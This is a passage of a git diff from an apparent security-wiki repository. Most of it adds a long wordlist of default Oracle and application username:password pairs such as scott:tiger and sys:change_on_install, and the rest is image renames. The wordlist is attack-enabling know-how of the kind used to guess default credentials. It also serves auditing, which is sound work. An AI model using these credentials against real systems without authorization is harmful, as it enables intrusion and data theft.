+CUI:CUI +cun:cun +CUN:CUN +cup:cup +CUP:CUP +cus:cus +CUS:CUS +cz:cz +CZ:CZ +data_schema:laskjdf098ksdaf09 +DATA_SCHEMA:LASKJDF098KSDAF09 +DAVIDMORGAN:DAVIDMORGAN +dbi:mumblefratz +DBI:MUMBLEFRATZ +dbsnmp:dbsnmp +DBSNMP:DBSNMP +dbvision:dbvision +DBVISION:DBVISION +DCM:DCM +DD7333:DD7333 +DD7334:DD7334 +DD810:DD810 +DD811:DD811 +DD812:DD812 +DD9:DD9 +DDB733:DDB733 +DDD:DDD +ddic:199220706 +DDIC:199220706 +demo8:demo8 +DEMO8:DEMO8 +demo9:demo9 +DEMO9:DEMO9 +demo:demo +DEMO:DEMO +des2k:des2k +DES2K:DES2K +des:des +DES:DES +dev2000_demos:dev2000_demos +DEV2000_DEMOS:DEV2000_DEMOS +DEVB733:DEVB733 +DEVUSER:DEVUSER +DGRAY:WELCOME +diane:passwo1 +DIANE:PASSWO1 +dip:dip +DIP:DIP +DISCOVERER5:DISCOVERER5 +discoverer_admin:discoverer_admin +DISCOVERER_ADMIN:DISCOVERER_ADMIN +DKING:DKING +DLD:DLD +DMADMIN:MANAGER +DMATS:DMATS +DMS:DMS +dmsys:dmsys +DMSYS:DMSYS +DOM:DOM +dpf:dpfpass +DPF:DPFPASS +DPOND:DPOND +dsgateway:dsgateway +DSGATEWAY:DSGATEWAY +dssys:dssys +DSSYS:DSSYS +dtsp:dtsp +DTSP:DTSP +DV7333:DV7333 +DV7334:DV7334 +DV810:DV810 +DV811:DV811 +DV812:DV812 +DV9:DV9 +DVP1:DVP1 +eaa:eaa +EAA:EAA +eam:eam +EAM:EAM +earlywatch:support +EARLYWATCH:SUPPORT +east:east +EAST:EAST +ec:ec +EC:EC +ecx:ecx +ECX:ECX +EDR:EDR +EDWEUL_US:EDWEUL_US +EDWREP:EDWREP +EGC1:EGC1 +EGD1:EGD1 +EGM1:EGM1 +EGO:EGO +EGR1:EGR1 +ejb:ejb +EJB:EJB +ejsadmin:ejsadmin +EJSADMIN:EJSADMIN +ejsadmin:ejsadmin_password +EJSADMIN:EJSADMIN_PASSWORD +emp:emp +EMP:EMP +END1:END1 +eng:eng +ENG:ENG +eni:eni +ENI:ENI +ENM1:ENM1 +ENS1:ENS1 +ENTMGR_CUST:ENTMGR_CUST +ENTMGR_PRO:ENTMGR_PRO +ENTMGR_TRAIN:ENTMGR_TRAIN +EOPP_PORTALADM:EOPP_PORTALADM +EOPP_PORTALMGR:EOPP_PORTALMGR +EOPP_USER:EOPP_USER +estoreuser:estore +ESTOREUSER:ESTORE +EUL_US:EUL_US +event:event +EVENT:EVENT +evm:evm +EVM:EVM +EXA1:EXA1 +EXA2:EXA2 +EXA3:EXA3 +EXA4:EXA4 +example:example +EXAMPLE:EXAMPLE +exfsys:exfsys +EXFSYS:EXFSYS +EXS1:EXS1 +EXS2:EXS2 +EXS3:EXS3 +EXS4:EXS4 +extdemo2:extdemo2 +EXTDEMO2:EXTDEMO2 +extdemo:extdemo +EXTDEMO:EXTDEMO +fa:fa +FA:FA +fem:fem +FEM:FEM +FIA1:FIA1 +fii:fii +FII:FII +finance:finance +FINANCE:FINANCE +finprod:finprod +FINPROD:FINPROD +flm:flm +FLM:FLM +fnd:fnd +FND:FND +FNI1:FNI1 +FNI2:FNI2 +foo:bar +FOO:BAR +FPA:FPA +fpt:fpt +FPT:FPT +frm:frm +FRM:FRM +frosty:snowman +FROSTY:SNOWMAN +FTA1:FTA1 +fte:fte +FTE:FTE +FUN:FUN +fv:fv +FV:FV +FVP1:FVP1 +GALLEN:GALLEN +GCA1:GCA1 +GCA2:GCA2 +GCA3:GCA3 +GCA9:GCA9 +GCMGR1:GCMGR1 +GCMGR2:GCMGR2 +GCMGR3:GCMGR3 +GCS1:GCS1 +GCS2:GCS2 +GCS3:GCS3 +GCS:GCS +GEORGIAWINE:GEORGIAWINE +GLA1:GLA1 +GLA2:GLA2 +GLA3:GLA3 +GLA4:GLA4 +gl:gl +GL:GL +GLS1:GLS1 +GLS2:GLS2 +GLS3:GLS3 +GLS4:GLS4 +gma:gma +GMA:GMA +GM_AWDA:GM_AWDA +GM_COPI:GM_COPI +gmd:gmd +GMD:GMD +GM_DPHD:GM_DPHD +gme:gme +GME:GME +gmf:gmf +GMF:GMF +gmi:gmi +GMI:GMI +gml:gml +GML:GML +GM_MLCT:GM_MLCT +gmp:gmp +GMP:GMP +GM_PLADMA:GM_PLADMA +GM_PLADMH:GM_PLADMH +GM_PLCCA:GM_PLCCA +GM_PLCCH:GM_PLCCH +GM_PLCOMA:GM_PLCOMA +GM_PLCOMH:GM_PLCOMH +GM_PLCONA:GM_PLCONA +GM_PLCONH:GM_PLCONH +GM_PLNSCA:GM_PLNSCA +GM_PLNSCH:GM_PLNSCH +GM_PLSCTA:GM_PLSCTA +GM_PLSCTH:GM_PLSCTH +GM_PLVET:GM_PLVET +gms:gms +GMS:GMS +GM_SPO:GM_SPO +GM_STKH:GM_STKH +gpfd:gpfd +GPFD:GPFD +gpld:gpld +GPLD:GPLD +gr:gr +GR:GR +GUEST:GUEST +hades:hades +HADES:HADES +HCC:HCC +hcpark:hcpark +HCPARK:HCPARK +HHCFO:HHCFO +hlw:hlw +HLW:HLW +hr:change_on_install +HR:CHANGE_ON_INSTALL +hr:hr +HR:HR +hri:hri +HRI:HRI +hr:unknown +HR:UNKNOWN +hvst:hvst +HVST:HVST +hxc:hxc +HXC:HXC +hxt:hxt +HXT:HXT +IA:IA +iba:iba +IBA:IBA +IBC:IBC +ibe:ibe +IBE:IBE +ibp:ibp +IBP:IBP +ibu:ibu +IBU:IBU +iby:iby +IBY:IBY +icdbown:icdbown +ICDBOWN:ICDBOWN +icx:icx +ICX:ICX +idemo_user:idemo_user +IDEMO_USER:IDEMO_USER +ieb:ieb +IEB:IEB +iec:iec +IEC:IEC +iem:iem +IEM:IEM +ieo:ieo +IEO:IEO +ies:ies +IES:IES +ieu:ieu +IEU:IEU +iex:iex +IEX:IEX +ifssys:ifssys +IFSSYS:IFSSYS +igc:igc +IGC:IGC +igf:igf +IGF:IGF +igi:igi +IGI:IGI +igs:igs +IGS:IGS +igw:igw +IGW:IGW +imageuser:imageuser +IMAGEUSER:IMAGEUSER +imc:imc +IMC:IMC +imedia:imedia +IMEDIA:IMEDIA +imt:imt +IMT:IMT +INS1:INS1 +INS2:INS2 +#internal:oracle +internal:oracle +#INTERNAL:ORACLE +INTERNAL:ORACLE +#internal:sys_stnt +internal:sys_stnt +#INTERNAL:SYS_STNT +INTERNAL:SYS_STNT +inv:inv +INV:INV +ipa:ipa +IPA:IPA +ipd:ipd +IPD:IPD +IP:IP +iplanet:iplanet +IPLANET:IPLANET +isc:isc +ISC:ISC +ISTEWARD:ISTEWARD +itg:itg +ITG:ITG +ja:ja +JA:JA +jake:passwo4 +JAKE:PASSWO4 +JD7333:JD7333 +JD7334:JD7334 +JD9:JD9 +JDEDBA:JDEDBA +JDE:JDE +je:je +JE:JE +jg:jg +JG:JG +jill:passwo2 +JILL:PASSWO2 +jl:jl: +JL :JL +JL:JL +jmuser:jmuser +JMUSER:JMUSER +JOHNINARI:JOHNINARI +john:john +JOHN:JOHN +jones:steel +JONES:STEEL +jtf:jtf +JTF:JTF +JTI:JTI +jtm:jtm +JTM:JTM +JTR:JTR +jts:jts +JTS:JTS +JUNK_PS:JUNK_PS +JUSTOSHUM:JUSTOSHUM +jward:airoplane +JWARD:AIROPLANE +KELLYJONES:KELLYJONES +KEVINDONS:KEVINDONS +KPN:KPN +kwalker:kwalker +KWALKER:KWALKER +l2ldemo:l2ldemo +L2LDEMO:L2LDEMO +LADAMS:LADAMS +lbacsys:lbacsys +LBACSYS:LBACSYS +LBA:LBA +LDQUAL:LDQUAL +LHILL:LHILL +librarian:shelves +LIBRARIAN:SHELVES +LNS:LNS +LQUINCY:LQUINCY +LSA:LSA +manprod:manprod +MANPROD:MANPROD +mark:passwo3 +MARK:PASSWO3 +mascarm:manager +MASCARM:MANAGER +master:password +MASTER:PASSWORD +mddata:mddata +MDDATA:MDDATA +mddemo_clerk:clerk +MDDEMO_CLERK:CLERK +mddemo_clerk:mgr +MDDEMO_CLERK:MGR +mddemo:mddemo +MDDEMO:MDDEMO +mddemo_mgr:mddemo_mgr +MDDEMO_MGR:MDDEMO_MGR +mddemo_mgr:mgr +MDDEMO_MGR:MGR +mdsys:mdsys +MDSYS:MDSYS +MDSYS:SYS +me:me +ME:ME +mfg:mfg +MFG:MFG +MGR1:MGR1 +MGR2:MGR2 +MGR3:MGR3 +MGR4:MGR4 +mgr:mgr +MGR:MGR +mgwuser:mgwuser +MGWUSER:MGWUSER +migrate:migrate +MIGRATE:MIGRATE +MIKEIKEGAMI:MIKEIKEGAMI +miller:miller +MILLER:MILLER +MJONES:MJONES +MLAKE:MLAKE +MM1:MM1 +MM2:MM2 +MM3:MM3 +MM4:MM4 +MM5:MM5 +MMARTIN:MMARTIN +mmo2:mmo2 +MMO2:MMO2 +mmo2:mmo3 +MMO2:MMO3 +mmo2:unknown +MMO2:UNKNOWN +MOBILEADMIN:WELCOME +modtest:yes +MODTEST:YES +moreau:moreau +MOREAU:MOREAU +mrp:mrp +MRP:MRP +msc:msc +MSC:MSC +msd:msd +MSD:MSD +mso:mso +MSO:MSO +msr:msr +MSR:MSR +MST:MST +mtssys:mtssys +MTSSYS:MTSSYS +mts_user:mts_password +MTS_USER:MTS_PASSWORD +mwa:mwa +MWA:MWA +mxagent:mxagent +MXAGENT:MXAGENT +names:names +NAMES:NAMES +NEILKATSU:NEILKATSU +neotix_sys:neotix_sys +NEOTIX_SYS:NEOTIX_SYS +nneul:nneulpass +NNEUL:NNEULPASS +nomeutente:password +NOMEUTENTE:PASSWORD +nome_utilizador:senha +NOME_UTILIZADOR:SENHA +nom_utilisateur:mot_de_passe +NOM_UTILISATEUR:MOT_DE_PASSE +nume_utilizator:parol +NUME_UTILIZATOR:PAROL +oas_public:oas_public +OAS_PUBLIC:OAS_PUBLIC +OBJ7333:OBJ7333 +OBJ7334:OBJ7334 +OBJB733:OBJB733 +OCA:OCA +ocitest:ocitest +OCITEST:OCITEST +ocm_db_admin:ocm_db_admin +OCM_DB_ADMIN:OCM_DB_ADMIN +odm_mtr:mtrpw +ODM_MTR:MTRPW +odm:odm +ODM:ODM +odscommon:odscommon +ODSCOMMON:ODSCOMMON +ods:ods +ODS:ODS +ods_server:ods_server +ODS_SERVER:ODS_SERVER +oe:change_on_install +OE:CHANGE_ON_INSTALL +oemadm:oemadm +OEMADM:OEMADM +oemrep:oemrep +OEMREP:OEMREP +oe:oe +OE:OE +oe:unknown +OE:UNKNOWN +okb:okb +OKB:OKB +okc:okc +OKC:OKC +oke:oke +OKE:OKE +oki:oki +OKI:OKI +OKL:OKL +oko:oko +OKO:OKO +okr:okr +OKR:OKR +oks:oks +OKS:OKS +okx:okx +OKX:OKX +OL810:OL810 +OL811:OL811 +OL812:OL812 +OL9:OL9 +olapdba:olapdba +OLAPDBA:OLAPDBA +olapsvr:instance +OLAPSVR:INSTANCE +olapsvr:olapsvr +OLAPSVR:OLAPSVR +olapsys:manager +OLAPSYS:MANAGER +olapsys:olapsys +OLAPSYS:OLAPSYS +omwb_emulation:oracle +OMWB_EMULATION:ORACLE +ont:ont +ONT:ONT +oo:oo +OO:OO +openspirit:openspirit +OPENSPIRIT:OPENSPIRIT +opi:opi +OPI:OPI +ORABAM:ORABAM +ORABAMSAMPLES:ORABAMSAMPLES +ORABPEL:ORABPEL +oracache:oracache +ORACACHE:ORACACHE +oracle:oracle +ORACLE:ORACLE +oradba:oradbapass +ORADBA:ORADBAPASS +ORAESB:ORAESB +ORAOCA_PUBLIC:ORAOCA_PUBLIC +oraprobe:oraprobe +ORAPROBE:ORAPROBE +oraregsys:oraregsys +ORAREGSYS:ORAREGSYS +ORASAGENT:ORASAGENT +orasso_ds:orasso_ds +ORASSO_DS:ORASSO_DS +orasso:orasso +ORASSO:ORASSO +orasso_pa:orasso_pa +ORASSO_PA:ORASSO_PA +orasso_ps:orasso_ps +ORASSO_PS:ORASSO_PS +orasso_public:orasso_public +ORASSO_PUBLIC:ORASSO_PUBLIC +orastat:orastat +ORASTAT:ORASTAT +orcladmin:welcome +ORCLADMIN:WELCOME +ordcommon:ordcommon +ORDCOMMON:ORDCOMMON +ordplugins:ordplugins +ORDPLUGINS:ORDPLUGINS +ordsys:ordsys +ORDSYS:ORDSYS +ose$http$admin:invalid +OSE$HTTP$ADMIN:INVALID +ose$http$admin:invalid:password +OSE$HTTP$ADMIN:Invalid password +osm:osm +OSM:OSM +osp22:osp22 +OSP22:OSP22 +ota:ota +OTA:OTA +outln:outln +OUTLN:OUTLN +owa:owa +OWA:OWA +owa_public:owa_public +OWA_PUBLIC:OWA_PUBLIC +OWAPUB:OWAPUB +owf_mgr:owf_mgr +OWF_MGR:OWF_MGR +owner:owner +OWNER:OWNER +ozf:ozf +OZF:OZF +ozp:ozp +OZP:OZP +ozs:ozs +OZS:OZS +PABLO:PABLO +PAIGE:PAIGE +PAM:PAM +panama:panama +PANAMA:PANAMA +pa:pa +PA:PA +PARRISH:PARRISH +PARSON:PARSON +PATORILY:PATORILY +PAT:PAT +PATRICKSANCHEZ:PATRICKSANCHEZ +patrol:patrol +PATROL:PATROL +PATSY:PATSY +PAULA:PAULA +paul:paul +PAUL:PAUL +PAXTON:PAXTON +PCA1:PCA1 +PCA2:PCA2 +PCA3:PCA3 +PCA4:PCA4 +PCS1:PCS1 +PCS2:PCS2 +PCS3:PCS3 +PCS4:PCS4 +PD7333:PD7333 +PD7334:PD7334 +PD810:PD810 +PD811:PD811 +PD812:PD812 +PD9:PD9 +PDA1:PDA1 +PEARL:PEARL +PEG:PEG +PENNY:PENNY +PEOPLE:PEOP1E +PERCY:PERCY +perfstat:perfstat +PERFSTAT:PERFSTAT +PERRY:PERRY +perstat:perstat +PERSTAT:PERSTAT +PETE:PETE +PEYTON:PEYTON +PHIL:PHIL +PJI:PJI +pjm:pjm +PJM:PJM +planning:planning +PLANNING:PLANNING +plex:plex +PLEX:PLEX +plsql:supersecret +PLSQL:SUPERSECRET +pm:change_on_install +PM:CHANGE_ON_INSTALL +pmi:pmi +PMI:PMI +pm:pm +PM:PM +pm:unknown +PM:UNKNOWN +pn:pn +PN:PN +po7:po7 +PO7:PO7 +po8:po8 +PO8:PO8 +poa:poa +POA:POA +POLLY:POLLY +pom:pom +POM:POM +PON:PON +po:po +PO:PO +portal30_admin:portal30_admin +PORTAL30_ADMIN:PORTAL30_ADMIN +portal30_demo:portal30_demo +PORTAL30_DEMO:PORTAL30_DEMO +portal30:portal30 +PORTAL30:PORTAL30 +portal30:portal31 +PORTAL30:PORTAL31 +portal30_ps:portal30_ps +PORTAL30_PS:PORTAL30_PS +portal30_public:portal30_public +PORTAL30_PUBLIC:PORTAL30_PUBLIC +portal30_sso_admin:portal30_sso_admin +PORTAL30_SSO_ADMIN:PORTAL30_SSO_ADMIN +portal30_sso:portal30_sso +PORTAL30_SSO:PORTAL30_SSO +portal30_sso_ps:portal30_sso_ps +PORTAL30_SSO_PS:PORTAL30_SSO_PS +portal30_sso_public:portal30_sso_public +PORTAL30_SSO_PUBLIC:PORTAL30_SSO_PUBLIC +PORTAL_APP:PORTAL_APP +portal_demo:portal_demo +PORTAL_DEMO:PORTAL_DEMO +PORTAL:PORTAL +PORTAL_PUBLIC:PORTAL_PUBLIC +portal_sso_ps:portal_sso_ps +PORTAL_SSO_PS:PORTAL_SSO_PS +pos:pos +POS:POS +powercartuser:powercartuser +POWERCARTUSER:POWERCARTUSER +PPM1:PPM1 +PPM2:PPM2 +PPM3:PPM3 +PPM4:PPM4 +PPM5:PPM5 +primary:primary +PRIMARY:PRIMARY +PRISTB733:PRISTB733 +PRISTCTL:PRISTCTL +PRISTDTA:PRISTDTA +PRODB733:PRODB733 +PRODCTL:PRODCTL +PRODDTA:PRODDTA +PRODUSER:PRODUSER +PROJMFG:WELCOME +PRP:PRP +PS810CTL:PS810CTL +PS810DTA:PS810DTA +PS810:PS810 +PS811CTL:PS811CTL +PS811DTA:PS811DTA +PS811:PS811 +PS812CTL:PS812CTL +PS812DTA:PS812DTA +PS812:PS812 +psa:psa +PSA:PSA +PSBASS:PSBASS +psb:psb +PSB:PSB +PSEM:PSEM +PSFTDBA:PSFTDBA +PSFT:PSFT +psp:psp +PSP:PSP +PS:PS +PTADMIN:PTADMIN +PTCNE:PTCNE +PTDMO:PTDMO +PTE:PTE +PTESP:PTESP +PTFRA:PTFRA +PTGER:PTGER +PTG:PTG +PTJPN:PTJPN +PTUKE:PTUKE +PTUPG:PTUPG +PTWEB:PTWEB +PTWEBSERVER:PTWEBSERVER +pubsub1:pubsub1 +PUBSUB1:PUBSUB1 +pubsub:pubsub +PUBSUB:PUBSUB +pv:pv +PV:PV +PY7333:PY7333 +PY7334:PY7334 +PY810:PY810 +PY811:PY811 +PY812:PY812 +PY9:PY9 +qa:qa +QA:QA +qdba:qdba +QDBA:QDBA +QOT:QOT +qp:qp +QP:QP +QRM:QRM +qs_adm:change_on_install +QS_ADM:CHANGE_ON_INSTALL +qs_adm:qs_adm +QS_ADM:QS_ADM +qs_adm:unknown +QS_ADM:UNKNOWN +qs_cbadm:change_on_install +QS_CBADM:CHANGE_ON_INSTALL +qs_cbadm:qs_cbadm +QS_CBADM:QS_CBADM +qs_cbadm:unknown +QS_CBADM:UNKNOWN +qs_cb:change_on_install +QS_CB:CHANGE_ON_INSTALL +qs_cb:qs_cb +QS_CB:QS_CB +qs_cb:unknown +QS_CB:UNKNOWN +qs:change_on_install +QS:CHANGE_ON_INSTALL +qs_cs:change_on_install +QS_CS:CHANGE_ON_INSTALL +qs_cs:qs_cs +QS_CS:QS_CS +qs_cs:unknown +QS_CS:UNKNOWN +qs_es:change_on_install +QS_ES:CHANGE_ON_INSTALL +qs_es:qs_es +QS_ES:QS_ES +qs_es:unknown +QS_ES:UNKNOWN +qs_os:change_on_install +QS_OS:CHANGE_ON_INSTALL +qs_os:qs_os +QS_OS:QS_OS +qs_os:unknown +QS_OS:UNKNOWN +qs:qs +QS:QS +qs:unknown +QS:UNKNOWN +qs_ws:change_on_install +QS_WS:CHANGE_ON_INSTALL +qs_ws:qs_ws +QS_WS:QS_WS +qs_ws:unknown +QS_WS:UNKNOWN +RENE:RENE +repadmin:repadmin +REPADMIN:REPADMIN +rep_manager:demo +REP_MANAGER:DEMO +reports:reports +REPORTS:REPORTS +reports_user:oem_temp +REPORTS_USER:OEM_TEMP +rep_owner:demo +REP_OWNER:DEMO +rep_owner:rep_owner +REP_OWNER:REP_OWNER +rep_user:demo +REP_USER:DEMO +re:re +RE:RE +RESTRICTED_US:RESTRICTED_US +rg:rg +RG:RG +rhx:rhx +RHX:RHX +rla:rla +RLA:RLA +rlm:rlm +RLM:RLM +RM1:RM1 +RM2:RM2 +RM3:RM3 +RM4:RM4 +RM5:RM5 +rmail:rmail +RMAIL:RMAIL +rman:rman +RMAN:RMAN +ROB:ROB +RPARKER:RPARKER +rrs:rrs +RRS:RRS +RWA1:RWA1 +SALLYH:SALLYH +sample:sample +SAMPLE:SAMPLE +SAM:SAM +sap:06071992 +SAP:06071992 +sapr3:sap +SAPR3:SAP +sap:sapr3 +SAP:SAPR3 +SARAHMANDY:SARAHMANDY +SCM1:SCM1 +SCM2:SCM2 +SCM3:SCM3 +SCM4:SCM4 +scott:tiger +SCOTT:TIGER +scott:tigger +SCOTT:TIGGER +SDAVIS:SDAVIS +sdos_icsap:sdos_icsap +SDOS_ICSAP:SDOS_ICSAP +secdemo:secdemo +SECDEMO:SECDEMO +SEDWARDS:SEDWARDS +SELLCM:SELLCM +SELLER:SELLER +SELLTREAS:SELLTREAS +serviceconsumer1:serviceconsumer1 +SERVICECONSUMER1:SERVICECONSUMER1 +SERVICES:WELCOME +SETUP:SETUP +sh:change_on_install +SH:CHANGE_ON_INSTALL +sh:sh +SH:SH +sh:unknown +SH:UNKNOWN +SID:SID +si_informtn_schema:si_informtn_schema +SI_INFORMTN_SCHEMA:SI_INFORMTN_SCHEMA +siteminder:siteminder +SITEMINDER:SITEMINDER +SKAYE:SKAYE +SKYTETSUKA:SKYTETSUKA +slide:slidepw +SLIDE:SLIDEPW +SLSAA:SLSAA +SLSMGR:SLSMGR +SLSREP:SLSREP +spierson:spierson +SPIERSON:SPIERSON +SRABBITT:SRABBITT +SRALPHS:SRALPHS +SRAY:SRAY +SRIVERS:SRIVERS +SSA1:SSA1 +SSA2:SSA2 +SSA3:SSA3 +SSC1:SSC1 +SSC2:SSC2 +SSC3:SSC3 +SSOSDK:SSOSDK +ssp:ssp +SSP:SSP +SSS1:SSS1 +starter:starter +STARTER:STARTER +strat_user:strat_passwd +STRAT_USER:STRAT_PASSWD +SUPPLIER:SUPPLIER +SVM7333:SVM7333 +SVM7334:SVM7334 +SVM810:SVM810 +SVM811:SVM811 +SVM812:SVM812 +SVM9:SVM9 +SVMB733:SVMB733 +SVP1:SVP1 +swpro:swpro +SWPRO:SWPRO +swuser:swuser +SWUSER:SWUSER +SY810:SY810 +SY811:SY811 +SY812:SY812 +SY9:SY9 +sympa:sympa +SYMPA:SYMPA +sys:0racl3 +SYS:0RACL3 +sys:0racl38 +SYS:0RACL38 +sys:0racl38i +SYS:0RACL38I +sys:0racl39 +SYS:0RACL39 +sys:0racl39i +SYS:0RACL39I +sys:0racle +SYS:0RACLE +sys:0racle8 +SYS:0RACLE8 +sys:0racle8i +SYS:0RACLE8I +sys:0racle9 +SYS:0RACLE9 +sys:0racle9i +SYS:0RACLE9I +SYS7333:SYS7333 +SYS7334:SYS7334 +sysadmin:sysadmin +SYSADMIN:SYSADMIN +sysadm:sysadm +SYSADM:SYSADM +SYSB733:SYSB733 +sys:change_on_install +SYS:CHANGE_ON_INSTALL +sys:d_syspw +SYS:D_SYSPW +sys:manag3r +SYS:MANAG3R +sys:manager +SYS:MANAGER +sysman:oem_temp +SYSMAN:OEM_TEMP +sysman:sysman +SYSMAN:SYSMAN +SYSMAN:WELCOME1 +sys:oracl3 +SYS:ORACL3 +sys:oracle +SYS:ORACLE +sys:oracle8 +SYS:ORACLE8 +sys:oracle8i +SYS:ORACLE8I +sys:oracle9 +SYS:ORACLE9 +sys:oracle9i +SYS:ORACLE9I +sys:sys +SYS:SYS +sys:syspass +SYS:SYSPASS +system:0racl3 +SYSTEM:0RACL3 +system:0racl38 +SYSTEM:0RACL38 +system:0racl38i +SYSTEM:0RACL38I +system:0racl39 +SYSTEM:0RACL39 +system:0racl39i +SYSTEM:0RACL39I +system:0racle +SYSTEM:0RACLE +system:0racle8 +SYSTEM:0RACLE8 +system:0racle8i +SYSTEM:0RACLE8I +system:0racle9 +SYSTEM:0RACLE9 +system:0racle9i +SYSTEM:0RACLE9I +system:change_on_install +SYSTEM:CHANGE_ON_INSTALL +system:d_syspw +SYSTEM:D_SYSPW +system:d_systpw +SYSTEM:D_SYSTPW +system:manag3r +SYSTEM:MANAG3R +system:manager +SYSTEM:MANAGER +system:oracl3 +SYSTEM:ORACL3 +system:oracle +SYSTEM:ORACLE +system:oracle8 +SYSTEM:ORACLE8 +system:oracle8i +SYSTEM:ORACLE8I +system:oracle9 +SYSTEM:ORACLE9 +system:oracle9i +SYSTEM:ORACLE9I +system:system +SYSTEM:SYSTEM +system:systempass +SYSTEM:SYSTEMPASS +SYSTEM:WELCOME1 +SYS:WELCOME1 +tahiti:tahiti +TAHITI:TAHITI +talbot:mt6ch5 +TALBOT:MT6CH5 +TDEMARCO:TDEMARCO +tdos_icsap:tdos_icsap +TDOS_ICSAP:TDOS_ICSAP +tec:tectec +TEC:TECTEC +TESTCTL:TESTCTL +TESTDTA:TESTDTA +test:passwd +TEST:PASSWD +testpilot:testpilot +TESTPILOT:TESTPILOT +test:test +TEST:TEST +test_user:test_user +TEST_USER:TEST_USER +thinsample:thinsamplepw +THINSAMPLE:THINSAMPLEPW +tibco:tibco +TIBCO:TIBCO +tip37:tip37 +TIP37:TIP37 +TRA1:TRA1 +tracesvr:trace +TRACESVR:TRACE +travel:travel +TRAVEL:TRAVEL +TRBM1:TRBM1 +TRCM1:TRCM1 +TRDM1:TRDM1 +TRRM1:TRRM1 +tsdev:tsdev +TSDEV:TSDEV +tsuser:tsuser +TSUSER:TSUSER +turbine:turbine +TURBINE:TURBINE +TWILLIAMS:TWILLIAMS +UDDISYS:UDDISYS +ultimate:ultimate +ULTIMATE:ULTIMATE +um_admin:um_admin +UM_ADMIN:UM_ADMIN +um_client:um_client +UM_CLIENT:UM_CLIENT +user0:user0 +USER0:USER0 +user1:user1 +USER1:USER1 +user2:user2 +USER2:USER2 +user3:user3 +USER3:USER3 +user4:user4 +USER4:USER4 +user5:user5 +USER5:USER5 +user6:user6 +USER6:USER6 +user7:user7 +USER7:USER7 +user8:user8 +USER8:USER8 +user9:user9 +USER9:USER9 +user_name:password +USER_NAME:PASSWORD +user:user +USER:USER +usuario:clave +USUARIO:CLAVE +utility:utility +UTILITY:UTILITY +utlbstatu:utlestat +UTLBSTATU:UTLESTAT +vea:vea +VEA:VEA +veh:veh +VEH:VEH +vertex_login:vertex_login +VERTEX_LOGIN:VERTEX_LOGIN +VIDEO31:VIDEO31 +VIDEO4:VIDEO4 +VIDEO5:VIDEO5 +videouser:videouser +VIDEOUSER:VIDEOUSER +vif_developer:vif_dev_pwd +VIF_DEVELOPER:VIF_DEV_PWD +viruser:viruser +VIRUSER:VIRUSER +VP1:VP1 +VP2:VP2 +VP3:VP3 +VP4:VP4 +VP5:VP5 +VP6:VP6 +vpd_admin:akf7d98s2 +VPD_ADMIN:AKF7D98S2 +vrr1:unknown +VRR1:UNKNOWN +vrr1:vrr1 +VRR1:VRR1 +vrr1:vrr2 +VRR1:VRR2 +WAA1:WAA1 +WAA2:WAA2 +WCRSYS:WCRSYS +webcal01:webcal01 +WEBCAL01:WEBCAL01 +webdb:webdb +WEBDB:WEBDB +webread:webread +WEBREAD:WEBREAD +websys:manager +WEBSYS:MANAGER +WEBSYS:WELCOME +webuser:your_pass +WEBUSER:YOUR_PASS +WENDYCHO:WENDYCHO +west:west +WEST:WEST +wfadmin:wfadmin +WFADMIN:WFADMIN +wh:wh +WH:WH +wip:wip +WIP:WIP +WIRELESS:WELCOME +WIRELESS:WIRELESS +wkadmin:wkadmin +WKADMIN:WKADMIN +wkproxy:change_on_install +WKPROXY:CHANGE_ON_INSTALL +wkproxy:unknown +WKPROXY:UNKNOWN +wkproxy:wkproxy +WKPROXY:WKPROXY +wksys:change_on_install +WKSYS:CHANGE_ON_INSTALL +wksys:wksys +WKSYS:WKSYS +wk_test:wk_test +WK_TEST:WK_TEST +wkuser:wkuser +WKUSER:WKUSER +wms:wms +WMS:WMS +wmsys:wmsys +WMSYS:WMSYS +wob:wob +WOB:WOB +wps:wps +WPS:WPS +wsh:wsh +WSH:WSH +wsm:wsm +WSM:WSM +wwwuser:wwwuser +WWWUSER:WWWUSER +www:www +WWW:WWW +xademo:xademo +XADEMO:XADEMO +xdb:change_on_install +XDB:CHANGE_ON_INSTALL +XDO:XDO +xdp:xdp +XDP:XDP +xla:xla +XLA:XLA +XLE:XLE +XNB:XNB +xnc:xnc +XNC:XNC +xni:xni +XNI:XNI +xnm:xnm +XNM:XNM +xnp:xnp +XNP:XNP +xns:xns +XNS:XNS +xprt:xprt +XPRT:XPRT +xtr:xtr +XTR:XTR +YCAMPOS:YCAMPOS +YSANCHEZ:YSANCHEZ +ZFA:ZFA +ZPB:ZPB +ZSA:ZSA +ZX:ZX diff --git a/.gitbook/assets/id-and-objectids-in-mongodb.png b/.gitbook/assets/id-and-objectids-in-mongodb.png new file mode 100644 index 00000000000..9b8348bf7c0 Binary files /dev/null and b/.gitbook/assets/id-and-objectids-in-mongodb.png differ diff --git a/src/files/iisfinal.txt b/.gitbook/assets/iisfinal.txt similarity index 100% rename from src/files/iisfinal.txt rename to .gitbook/assets/iisfinal.txt diff --git a/src/images/image (28) (1) (1).png b/.gitbook/assets/image (1).png similarity index 100% rename from src/images/image (28) (1) (1).png rename to .gitbook/assets/image (1).png diff --git a/src/images/image (595).png b/.gitbook/assets/image (10).png similarity index 100% rename from src/images/image (595).png rename to .gitbook/assets/image (10).png diff --git a/src/images/image (277).png b/.gitbook/assets/image (100).png similarity index 100% rename from src/images/image (277).png rename to .gitbook/assets/image (100).png diff --git a/.gitbook/assets/image (101).png b/.gitbook/assets/image (101).png new file mode 100644 index 00000000000..ad148394b77 Binary files /dev/null and b/.gitbook/assets/image (101).png differ diff --git a/src/images/image (1090).png b/.gitbook/assets/image (102).png similarity index 100% rename from src/images/image (1090).png rename to .gitbook/assets/image (102).png diff --git a/src/images/image (872).png b/.gitbook/assets/image (103).png similarity index 100% rename from src/images/image (872).png rename to .gitbook/assets/image (103).png diff --git a/src/images/image (5) (1) (1) (2) (1).png b/.gitbook/assets/image (104).png similarity index 100% rename from src/images/image (5) (1) (1) (2) (1).png rename to .gitbook/assets/image (104).png diff --git a/.gitbook/assets/image (105).png b/.gitbook/assets/image (105).png new file mode 100644 index 00000000000..a2f6967a818 Binary files /dev/null and b/.gitbook/assets/image (105).png differ diff --git a/src/images/image (482).png b/.gitbook/assets/image (106).png similarity index 100% rename from src/images/image (482).png rename to .gitbook/assets/image (106).png diff --git a/src/images/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png b/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1).png similarity index 100% rename 